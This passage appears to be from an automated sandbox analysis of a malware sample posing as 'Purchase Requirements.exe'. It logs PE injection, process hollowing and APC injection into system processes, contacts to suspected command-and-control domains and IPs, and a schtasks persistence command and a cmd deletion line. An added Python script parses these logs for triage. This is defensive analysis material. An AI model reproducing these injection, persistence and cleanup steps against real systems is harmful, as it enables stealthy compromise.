Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_044537F5 mov eax, dword ptr fs:[00000030h] 15_2_044537F5
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_044D138A mov eax, dword ptr fs:[00000030h] 15_2_044D138A
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_044CD380 mov ecx, dword ptr fs:[00000030h] 15_2_044CD380
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_04421B8F mov eax, dword ptr fs:[00000030h] 15_2_04421B8F
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_04421B8F mov eax, dword ptr fs:[00000030h] 15_2_04421B8F
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_0444B390 mov eax, dword ptr fs:[00000030h] 15_2_0444B390
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_04428794 mov eax, dword ptr fs:[00000030h] 15_2_04428794
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_04497794 mov eax, dword ptr fs:[00000030h] 15_2_04497794
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_04497794 mov eax, dword ptr fs:[00000030h] 15_2_04497794
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_04497794 mov eax, dword ptr fs:[00000030h] 15_2_04497794
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_044E5BA5 mov eax, dword ptr fs:[00000030h] 15_2_044E5BA5
Enables debug privileges
Source: C:\Users\user\Desktop\Purchase Requirements.exe Process token adjusted: Debug
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process token adjusted: Debug
Source: C:\Windows\SysWOW64\colorcpl.exe Process token adjusted: Debug
Source: C:\Users\user\Desktop\Purchase Requirements.exe Memory allocated: page read and write | page guard

HIPS / PFW / Operating System Protection Evasion:

System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe Domain query: www.mariasmoworldwide.com
Source: C:\Windows\explorer.exe Network Connect: 217.160.0.129 80
Source: C:\Windows\explorer.exe Network Connect: 160.153.136.3 80
Source: C:\Windows\explorer.exe Network Connect: 23.227.38.74 80
Source: C:\Windows\explorer.exe Domain query: www.thefitflect.com
Source: C:\Windows\explorer.exe Network Connect: 162.241.85.227 80
Source: C:\Windows\explorer.exe Network Connect: 74.208.236.212 80
Source: C:\Windows\explorer.exe Domain query: www.goldenstatelabradoodles.com
Source: C:\Windows\explorer.exe Domain query: www.narrowpathwc.com
Source: C:\Windows\explorer.exe Network Connect: 34.102.136.180 80
Source: C:\Windows\explorer.exe Domain query: www.braun-mathematik.online
Source: C:\Windows\explorer.exe Domain query: www.mynjelderlaw.com
Injects a PE file into a foreign processes
Source: C:\Users\user\Desktop\Purchase Requirements.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000 value starts with: 4D5A
Maps a DLL or memory area into another process
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: unknown target: C:\Windows\SysWOW64\colorcpl.exe protection: execute and read and write
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: unknown target: C:\Windows\SysWOW64\colorcpl.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\colorcpl.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
Source: C:\Windows\SysWOW64\colorcpl.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Modifies the context of a thread in another process (thread injection)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread register set: target process: 3424
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread register set: target process: 3424
Source: C:\Windows\SysWOW64\colorcpl.exe Thread register set: target process: 3424
Queues an APC in another process (thread injection)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread APC queued: target process: C:\Windows\explorer.exe
Sample uses process hollowing technique
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section unmapped: C:\Windows\SysWOW64\colorcpl.exe base address: 60000
Writes to foreign memory regions
Source: C:\Users\user\Desktop\Purchase Requirements.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000
Source: C:\Users\user\Desktop\Purchase Requirements.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 401000
Source: C:\Users\user\Desktop\Purchase Requirements.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: B42008
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\Desktop\Purchase Requirements.exe Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\UCnSWpQKXBXg' /XML 'C:\Users\user\AppData\Local\Temp\tmp47B.tmp'
Source: C:\Users\user\Desktop\Purchase Requirements.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
Source: C:\Windows\SysWOW64\colorcpl.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe'
Source: explorer.exe, 00000008.00000000.728424722.0000000000AD8000.00000004.00000020.sdmp Binary or memory string: ProgmanMD6
Source: explorer.exe, 00000008.00000000.731907032.0000000001080000.00000002.00000001.sdmp Binary or memory string: Program Manager
Source: explorer.exe, 00000008.00000000.731907032.0000000001080000.00000002.00000001.sdmp Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000008.00000000.731907032.0000000001080000.00000002.00000001.sdmp Binary or memory string: Progman
Source: explorer.exe, 00000008.00000000.731907032.0000000001080000.00000002.00000001.sdmp Binary or memory string: Progmanlock
Source: explorer.exe, 00000008.00000000.715378228.000000000A716000.00000004.00000001.sdmp Binary or memory string: Shell_TrayWnd5D
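The evidence in this section reads as one chain: the sample writes a PE image (MZ header at 0x400000) into the MSBuild.exe it created, MSBuild.exe maps execute-read-write sections into explorer.exe and colorcpl.exe, sets a thread context and queues an APC, the image in colorcpl.exe is unmapped (hollowing), explorer.exe then resolves and connects to the candidate C2 hosts, the sample persists through a schtasks /XML task built from a file in %TEMP%, and colorcpl.exe finally deletes the MSBuild.exe host. The Python script below is an added example, not part of this report and not Joe Sandbox code: it parses a constructed subset of the 'Source: ...' lines reproduced from this section, rebuilds that chain, lists the network IOCs attributed to explorer.exe, and flags the persistence and cleanup command lines. The regexes, the function names and the list of processes treated as system processes are this example's own assumptions.

```python
# Added triage example (not report or Joe Sandbox code): rebuilds the injection
# chain, explorer.exe IOCs and persistence/cleanup commands from 'Source:' lines.
import ntpath
import re

# Constructed input: evidence lines copied from this report, link residue included.
REPORT_LINES = r"""
Source: C:\Windows\explorer.exe Domain query: www.mariasmoworldwide.com
Source: C:\Windows\explorer.exe Network Connect: 217.160.0.129 80 Jump to behavior
Source: C:\Windows\explorer.exe Domain query: www.thefitflect.com
Source: C:\Windows\explorer.exe Network Connect: 34.102.136.180 80 Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: unknown target: C:\Windows\SysWOW64\colorcpl.exe protection: execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: read write Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread register set: target process: 3424 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread APC queued: target process: C:\Windows\explorer.exe Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section unmapped: C:\Windows\SysWOW64\colorcpl.exe base address: 60000 Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\UCnSWpQKXBXg' /XML 'C:\Users\user\AppData\Local\Temp\tmp47B.tmp' Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe' Jump to behavior
""".strip().splitlines()

_JUMP = re.compile(r"\s*Jump to behavior$")  # strip the report's link text
PATTERNS = {  # one regex per evidence type; the kind names are this example's own
    "domain":   re.compile(r"^Source: (?P<src>.+?) Domain query: (?P<domain>\S+)$"),
    "connect":  re.compile(r"^Source: (?P<src>.+?) Network Connect: (?P<ip>[\d.]+) (?P<port>\d+)$"),
    "memwrite": re.compile(r"^Source: (?P<src>.+?) Memory written: (?P<tgt>.+?) base: "
                           r"(?P<base>[0-9A-Fa-f]+)(?: value starts with: (?P<magic>[0-9A-Fa-f]+))?$"),
    "mapped":   re.compile(r"^Source: (?P<src>.+?) Section loaded: unknown target: (?P<tgt>.+?) protection: (?P<prot>.+)$"),
    "ctx":      re.compile(r"^Source: (?P<src>.+?) Thread register set: target process: (?P<pid>\d+)$"),
    "apc":      re.compile(r"^Source: (?P<src>.+?) Thread APC queued: target process: (?P<tgt>.+)$"),
    "unmap":    re.compile(r"^Source: (?P<src>.+?) Section unmapped: (?P<tgt>.+?) base address: (?P<base>[0-9A-Fa-f]+)$"),
    "proc":     re.compile(r"^Source: (?P<src>.+?) Process created: (?P<cmd>.+)$"),
}

def short(path):
    return ntpath.basename(path)  # image name only; ntpath handles backslashes on any host

def parse_events(lines):
    """Turn raw 'Source: ...' lines into dicts tagged with their event kind."""
    events = []
    for raw in lines:
        line = _JUMP.sub("", raw.strip())
        for kind, pat in PATTERNS.items():
            m = pat.match(line)
            if m:
                events.append({"kind": kind, **m.groupdict()})
                break
    return events

def injection_chain(events):
    """Ordered, de-duplicated (source, target, technique) edges of the injection."""
    edges = {}
    for e in events:
        k, src = e["kind"], short(e["src"])
        if k == "memwrite":
            what = "writes PE image (MZ header)" if (e["magic"] or "").upper() == "4D5A" else "writes memory"
            edges[(src, short(e["tgt"]), f"{what} at 0x{e['base']}")] = None
        elif k == "mapped":
            edges[(src, short(e["tgt"]), "maps RWX section" if "execute" in e["prot"] else "maps RW section")] = None
        elif k == "unmap":
            edges[(src, short(e["tgt"]), f"unmaps image at 0x{e['base']} (hollowing)")] = None
        elif k == "apc":
            edges[(src, short(e["tgt"]), "queues APC")] = None
        elif k == "ctx":
            edges[(src, f"pid {e['pid']}", "sets thread context")] = None
    return list(edges)

def system_process_iocs(events, system_procs=("explorer.exe",)):
    """Domains and ip:port pairs initiated by processes that should never talk out on their own."""
    iocs = {"domains": [], "sockets": []}
    for e in events:
        if short(e["src"]).lower() not in system_procs:
            continue
        if e["kind"] == "domain" and e["domain"] not in iocs["domains"]:
            iocs["domains"].append(e["domain"])
        elif e["kind"] == "connect" and (e["ip"], int(e["port"])) not in iocs["sockets"]:
            iocs["sockets"].append((e["ip"], int(e["port"])))
    return iocs

def suspicious_commands(events):
    """Flag schtasks /XML persistence from %TEMP% and deletion of a process used as injection host."""
    hosts = {short(e["tgt"]).lower() for e in events if e["kind"] in ("memwrite", "mapped", "unmap", "apc")}
    findings = []
    for e in events:
        if e["kind"] != "proc":
            continue
        cmd, low = e["cmd"], e["cmd"].lower()
        if "schtasks" in low and "/create" in low and "/xml" in low and "\\appdata\\local\\temp\\" in low:
            m = re.search(r"/TN\s+'([^']+)'", cmd, re.I)
            findings.append((f"scheduled task '{m.group(1) if m else '?'}' created from XML in %TEMP%", cmd))
        if re.search(r"cmd\.exe\s+/c\s+del\b", low):
            deleted = sorted(h for h in hosts if h in low)
            if deleted:
                findings.append((f"injection host deleted: {', '.join(deleted)}", cmd))
    return findings

if __name__ == "__main__":
    evs = parse_events(REPORT_LINES)
    for src, tgt, how in injection_chain(evs):
        print(f"{src} -> {tgt}: {how}")
    print(system_process_iocs(evs))
    for why, cmd in suspicious_commands(evs):
        print(f"[!] {why}: {cmd}")
```

Run stand-alone it prints the seven-edge chain, the two domains and two sockets attributed to explorer.exe, and the two command-line findings. In practice the same parser is pointed at the full report text, and the system_procs tuple is extended to whatever the environment treats as a process that must never initiate outbound connections.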

Language, Device and Operating System Detection:

Queries the volume information (name, serial number etc) of a device
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Users\user\Desktop\Purchase Requirements.exe VolumeInformation
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Runtime.Remoting\v4.0_4.0.0.0__b77a5c561934e089\System.Runtime.Remoting.dll VolumeInformation
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformation
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformation
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformation
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformation
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformation
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformation
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformation
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformation
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformation
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\consola.ttf VolumeInformation
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformation
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformation
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformation
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformation
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation Jump to behavior
